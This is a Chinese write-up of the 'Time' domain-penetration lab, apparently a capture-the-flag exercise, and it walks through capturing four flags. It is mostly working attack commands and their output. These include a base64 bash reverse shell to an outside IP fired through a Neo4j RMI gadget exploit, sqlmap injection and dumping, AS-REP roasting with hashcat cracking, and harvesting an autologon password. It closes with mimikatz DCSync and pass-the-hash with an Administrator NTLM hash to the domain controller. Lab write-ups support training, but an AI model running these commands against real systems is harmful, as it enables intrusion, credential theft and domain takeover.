Time Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
tag Neo4j、Privilege Elevation、Kerberos、域渗透
信息搜集 先用fscan扫一下机器./fscan.exe -h 39.98.107.186 -p 1-65535 -nobr
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 39.98.107.186:22 open 39.98.107.186:1337 open 39.98.107.186:7474 open 39.98.107.186:7473 open 39.98.107.186:7687 open 39.98.107.186:41409 open [*] alive ports len is: 6 start vulscan 已完成 1/6 [-] webtitle https://39.98.107.186:1337 Get "https://39.98.107.186:1337": EOF [*] WebTitle http://39.98.107.186:7474 code:303 len:0 title:None 跳转url: http://39.98.107.186:7474/browser/ [*] WebTitle https://39.98.107.186:7687 code:400 len:50 title:None [*] WebTitle http://39.98.107.186:7474/browser/ code:200 len:3279 title:Neo4j Browser [*] WebTitle https://39.98.107.186:7473 code:303 len:0 title:None 跳转url: https://39.98.107.186:7473/browser/ [*] WebTitle https://39.98.107.186:7473/browser/ code:200 len:3279 title:Neo4j Browser 已完成 6/6 [*] 扫描结束,耗时: 4m33.9089862s
机器36 7687端口比较特别,查资料发现是Neo4j图数据库的默认端口。400错误说明可能存在未授权访问echo "bash -i >& /dev/tcp/119.45.6.65/8888 0>&1" | base64nc -lvvp 8888java -jar rhino_gadget.jar rmi://39.98.107.186:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuNDUuNi42NS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"python3 -m http.server 80wget http://119.45.6.65/linux_x64_agent
./linux_x64_agent -l 44444 -s 123./linux_x64_admin -c 39.98.107.186:44444 -s 123
成功连接,拿flag01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 neo4j@ubuntu:~$ cat flag01.txt cat flag01.txt ██████████ ██ ░░░░░██░░░ ░░ ░██ ██ ██████████ █████ ░██ ░██░░██░░██░░██ ██░░░██ ░██ ░██ ░██ ░██ ░██░███████ ░██ ░██ ░██ ░██ ░██░██░░░░ ░██ ░██ ███ ░██ ░██░░██████ ░░ ░░ ░░░ ░░ ░░ ░░░░░░ flag01: flag{71d59e48-f05f-43d4-8d98-3917d37ff490} Do you know the authentication process of Kerberos? ......This will be the key to your progress.
然后用stowaway传个fscan上去upload /home/kali/Desktop/fscan /tmp/fscanifconfig./fscan -h 172.22.6.0/24
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.6.38 is alive (icmp) Target 172.22.6.12 is alive (icmp) Target 172.22.6.36 is alive (icmp) Target 172.22.6.25 is alive [*] Icmp alive hosts len is: 4 172.22.6.38:80 open 172.22.6.12:88 open 172.22.6.25:445 open 172.22.6.12:445 open 172.22.6.25:139 open 172.22.6.12:139 open 172.22.6.25:135 open 172.22.6.12:135 open 172.22.6.38:22 open 172.22.6.36:22 open 172.22.6.36:7687 open [*] alive ports len is: 11 start vulscan [*] NetInfo [*]172.22.6.12 [->]DC-PROGAME [->]172.22.6.12 [*] WebTitle http://172.22.6.38 code:200 len:1531 title:后台登录 [*] NetBios 172.22.6.12 [+] DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] NetBios 172.22.6.25 XIAORANG\WIN2019 [*] OsInfo 172.22.6.12 (Windows Server 2016 Datacenter 14393) [*] NetInfo [*]172.22.6.25 [->]WIN2019 [->]172.22.6.25 [*] WebTitle https://172.22.6.36:7687 code:400 len:50 title:None 已完成 11/11 [*] 扫描结束,耗时: 11.882757703s
172.22.6.12 DC域控制器
机器38 访问http://172.22.6.38发现是个登录界面,bp抓包把请求包写入bp.txt后利用sqlmap进行检测 proxychains sqlmap -r bp.txt
1 2 3 4 [09:23:24] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12
proxychains sqlmap -r bp.txt --os-shellproxychains sqlmap -r bp.txt --dbs
1 2 3 4 5 [*] information_schema [*] mysql [*] oa_db [*] performance_schema [*] sys
proxychains sqlmap -r bp.txt -D 'oa_db' --tables
1 2 3 4 5 +------------+ | oa_admin | | oa_f1Agggg | | oa_users | +------------+
proxychains sqlmap -r bp.txt -D 'oa_db' -T 'oa_f1Agggg' --dump
1 2 3 4 5 +----+--------------------------------------------+ | id | flag02 | +----+--------------------------------------------+ | 1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} | +----+--------------------------------------------+
这样就获取flag02啦proxychains sqlmap -r bp.txt --dump
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 +-----+----------------------------+-------------+-----------------+ | id | email | phone | username | +-----+----------------------------+-------------+-----------------+ | 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN | | 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI | | 247 | buning@xiaorang.lab | 13046481392 | BU NING | | 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU | | 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI | | 250 | fuyi@xiaorang.lab | 18902082658 | FU YI | | 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG | | 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO | | 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN | | 254 | dulun@xiaorang.lab | 13352331157 | DU LUN | | 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN | | 256 | gexin@xiaorang.lab | 18181553086 | GE XIN | | 257 | lugu@xiaorang.lab | 18793883130 | LU GU | | 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG | | 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI | | 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN | | 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI | | 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU | | 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN | | 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU | | 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU | | 266 | maqun@xiaorang.lab | 15235945624 | MA QUN | | 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO | | 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN | | 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN | | 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN | | 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG | | 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE | | 273 | luyue@xiaorang.lab | 18299785575 | LU YUE | | 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN | | 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN | | 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG | | 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG | | 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE | | 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN | | 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN | | 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN | | 282 | yexing@xiaorang.lab | 13719043564 | YE XING | | 283 | maoda@xiaorang.lab | 13878840690 | MAO DA | | 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI | | 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN | | 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU | | 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU | | 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN | | 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU | | 290 | yixue@xiaorang.lab | 18451603140 | YI XUE | | 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN | | 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN | | 293 | lefen@xiaorang.lab | 13271196544 | LE FEN | | 294 | yubo@xiaorang.lab | 13462202742 | YU BO | | 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI | | 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN | | 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN | | 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG | | 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU | | 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG | | 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN | | 302 | diyan@xiaorang.lab | 18534028047 | DI YAN | | 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU | | 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN | | 305 | fandi@xiaorang.lab | 15846960039 | FAN DI | | 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN | | 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI | | 308 | didi@xiaorang.lab | 13413041463 | DI DI | | 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN | | 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN | | 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU | | 312 | xundi@xiaorang.lab | 18358493414 | XUN DI | | 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN | | 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE | | 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI | | 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO | | 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI | | 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI | | 319 | yufen@xiaorang.lab | 18432795588 | YU FEN | | 320 | jiyi@xiaorang.lab | 13574211454 | JI YI | | 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO | | 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E | | 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI | | 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN | | 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU | | 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING | | 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN | | 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN | | 329 | oulun@xiaorang.lab | 13402760696 | OU LUN | | 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG | | 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG | | 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE | | 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI | | 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI | | 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE | | 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING | | 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO | | 338 | guhui@xiaorang.lab | 15166711352 | GU HUI | | 339 | baoai@xiaorang.lab | 15837430827 | BAO AI | | 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO | | 341 | xingye@xiaorang.lab | 13367587521 | XING YE | | 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI | | 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG | | 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI | | 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO | | 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN | | 347 | luxing@xiaorang.lab | 18318675030 | LU XING | | 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN | | 349 | duyue@xiaorang.lab | 15515878208 | DU YUE | | 350 | xijun@xiaorang.lab | 17871583183 | XI JUN | | 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING | | 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO | | 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG | | 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU | | 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING | | 356 | luhong@xiaorang.lab | 17766091079 | LU HONG | | 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE | | 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN | | 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG | | 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU | | 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI | | 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING | | 363 | xiai@xiaorang.lab | 18148404789 | XI AI | | 364 | bihe@xiaorang.lab | 13628593791 | BI HE | | 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI | | 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG | | 367 | pangning@xiaorang.lab | 13443921700 | PANG NING | | 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI | | 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN | | 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE | | 371 | mayong@xiaorang.lab | 15622971484 | MA YONG | | 372 | hangda@xiaorang.lab | 15937701659 | HANG DA | | 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU | | 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN | | 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU | | 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN | | 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG | | 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO | | 379 | heli@xiaorang.lab | 13701347081 | HE LI | | 380 | haoming@xiaorang.lab | 15049615282 | HAO MING | | 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI | | 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE | | 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN | | 384 | linxi@xiaorang.lab | 18052976097 | LIN XI | | 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU | | 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING | | 387 | qiai@xiaorang.lab | 18154690198 | QI AI | | 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN | | 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG | | 390 | huaren@xiaorang.lab | 13307653720 | HUA REN | | 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI | | 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN | | 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN | | 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI | | 395 | sunli@xiaorang.lab | 18233801124 | SUN LI | | 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN | | 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG | | 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO | | 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU | | 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN | | 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN | | 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN | | 403 | hualu@xiaorang.lab | 13641470801 | HUA LU | | 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING | | 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO | | 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI | | 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN | | 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN | | 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN | | 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN | | 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI | | 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO | | 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI | | 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI | | 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG | | 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN | | 417 | yetai@xiaorang.lab | 13400150018 | YE TAI | | 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE | | 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN | | 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG | | 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG | | 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN | | 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN | | 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI | | 425 | niuya@xiaorang.lab | 13915041589 | NIU YA | | 426 | guwei@xiaorang.lab | 13584571917 | GU WEI | | 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN | | 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN | | 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN | | 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN | | 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU | | 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU | | 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN | | 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU | | 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG | | 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI | | 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG | | 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG | | 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO | | 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO | | 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE | | 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG | | 443 | xudi@xiaorang.lab | 18498838233 | XU DI | | 444 | wulun@xiaorang.lab | 18350490780 | WU LUN | | 445 | yuling@xiaorang.lab | 18835870616 | YU LING | | 446 | taoya@xiaorang.lab | 18494928860 | TAO YA | | 447 | jinle@xiaorang.lab | 15329208123 | JIN LE | | 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO | | 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI | | 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO | | 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE | | 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING | | 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN | | 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI | | 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG | | 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG | | 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU | | 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN | | 459 | yurui@xiaorang.lab | 15764121637 | YU RUI | | 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU | | 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN | | 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE | | 463 | wohong@xiaorang.lab | 18404022650 | WO HONG | | 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI | | 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG | | 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI | | 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN | | 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU | | 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN | | 470 | qijie@xiaorang.lab | 15631483536 | QI JIE | | 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING | | 472 | xiqi@xiaorang.lab | 18938747522 | XI QI | | 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG | | 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU | | 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA | | 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE | | 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA | | 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN | | 479 | jiyu@xiaorang.lab | 18650881187 | JI YU | | 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG | | 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN | | 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN | | 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN | | 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE | | 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO | | 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN | | 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG | | 488 | songming@xiaorang.lab | 13220512663 | SONG MING | | 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN | | 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI | | 491 | youyi@xiaorang.lab | 18036808394 | YOU YI | | 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU | | 493 | fuyi@xiaorang.lab | 15632151678 | FU YI | | 494 | linli@xiaorang.lab | 17883399275 | LIN LI | | 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE | | 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN | | 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI | | 498 | siyi@xiaorang.lab | 17873307773 | SI YI | | 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN | | 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG | +-----+----------------------------+-------------+-----------------+
这里的的email就很像是域用户,写个脚本把用户名提取出来保存为2.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import re # 读取源文件内容 with open('1.txt', 'r') as file: content = file.read() # 使用正则表达式匹配所有目标邮箱并提取用户名 matches = re.findall(r'(\w+)@xiaorang\.lab', content) # 去重并保持原始顺序 unique_matches = [] for match in matches: if match not in unique_matches: unique_matches.append(match) # 将结果写入新文件(每个用户名占一行) with open('2.txt', 'w') as output_file: output_file.write('\n'.join(unique_matches)) print(f"成功提取 {len(unique_matches)} 个用户名到 2.txt")
GetNPUsers.py是Impacket工具包中的一个脚本,该脚本实现了将尝试为那些设置了属性“不需要Kerberos预身份验证”的用户获取TGT输出。TGT hash 包含用户密码,获取到之后直接用 JTR 或者 hashcat 破解即可。proxychains impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile 2.txt xiaorang.lab/
1 $krb5asrep$23$zhangxin@XIAORANG.LAB:33b29a5e607fe08df10fe058fd413199$d3cbf653d743ffcf112d47747866ff69a70a99c4276c84731321e667d1ceb5b6ecb3273370f19567af0f53819c46e954f9572d079f7587afdb708077cc508aed3d66846a3f23ffa30c4cdf42edbe6038d91f44c00650fa3427bb1833f830a1273f1e183255aadfc9ce75b01e202f350138e6cda90d3ab32a292e884fbe9a16c2e4caa4b6a42195d426694c79e63a443487b88f26f4629f3ff4d6dbe59201878f572878dab5472edf8410bac550ea3968a490c35c643a2b320845f5a30028fc86ec50794f124422dc2d709a85b5b249360b7d340781b861dcf506b26dd5804cd704d54bf4e316bc9f7bc747f0
-m 18200: Kerberos 5, etype 23, AS-REP (Authentication Service Reply)$krb5asrep$23$UserAccountName@REALM:HexEncodedPart1$HexEncodedPart2
hashcat -a 0 -m 18200 --force hash.txt /usr/share/wordlists/rockyou.txt
1 $krb5asrep$23$zhangxin@XIAORANG.LAB:33b29a5e607fe08df10fe058fd413199$d3cbf653d743ffcf112d47747866ff69a70a99c4276c84731321e667d1ceb5b6ecb3273370f19567af0f53819c46e954f9572d079f7587afdb708077cc508aed3d66846a3f23ffa30c4cdf42edbe6038d91f44c00650fa3427bb1833f830a1273f1e183255aadfc9ce75b01e202f350138e6cda90d3ab32a292e884fbe9a16c2e4caa4b6a42195d426694c79e63a443487b88f26f4629f3ff4d6dbe59201878f572878dab5472edf8410bac550ea3968a490c35c643a2b320845f5a30028fc86ec50794f124422dc2d709a85b5b249360b7d340781b861dcf506b26dd5804cd704d54bf4e316bc9f7bc747f0:strawberry
也就是zhangxin@XIAORANG.LAB :strawberry
机器25 在windows配个代理(proxifier)./linux_x64_agent -l 44445 -s 123./windows_x64_admin.exe -c 39.98.107.186:44445 -s 123SharpHound.exe -c all
将zip文件导入bloodhound中
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 C:\Users\zhangxin>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DisableBackButton REG_DWORD 0x1 EnableSIHostIntegration REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 ShellAppRuntime REG_SZ ShellAppRuntime.exe scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0x211ad923e0 ShutdownFlags REG_DWORD 0x80000027 AutoLogonSID REG_SZ S-1-5-21-3623938633-4064111800-2925858365-1180 LastUsedUsername REG_SZ yuxuan AutoAdminLogon REG_SZ 1 DefaultUserName REG_SZ yuxuan DefaultPassword REG_SZ Yuxuan7QbrgZ3L DefaultDomainName REG_SZ xiaorang.lab HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
找到yuxuan用户的密码lsadump::dcsync /domain:xiaorang.lab /all /csv
1 500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512
所以可以直接进行PTH拿25机器的高权限flag03proxychains impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
1 2 3 4 5 6 7 8 C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt flag03: flag{fa146ed1-4b58-45ad-92c0-84b1cfe68592} Maybe you can find something interesting on this server. ======================================= What you may not know is that many objects in this domain are moved from other domains.
域控 然后同样PTH拿域控机器上的flag04proxychains impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12 -codec gbk
1 2 3 4 5 6 7 8 9 10 11 12 13 C:\Windows\system32>type C:\Users\Administrator\flag\flag04.txt Awesome! you got the final flag. :::::::::::::::::::::::::: :::: :::::::::: :+: :+: +:+:+: :+:+:+:+: +:+ +:+ +:+ +:+:+ +:++:+ +#+ +#+ +#+ +:+ +#++#++:++# +#+ +#+ +#+ +#++#+ #+# #+# #+# #+##+# ### ############## ############# flag04: flag{fd60ce54-3cae-440a-afbd-4c5bc0d6a9c5}
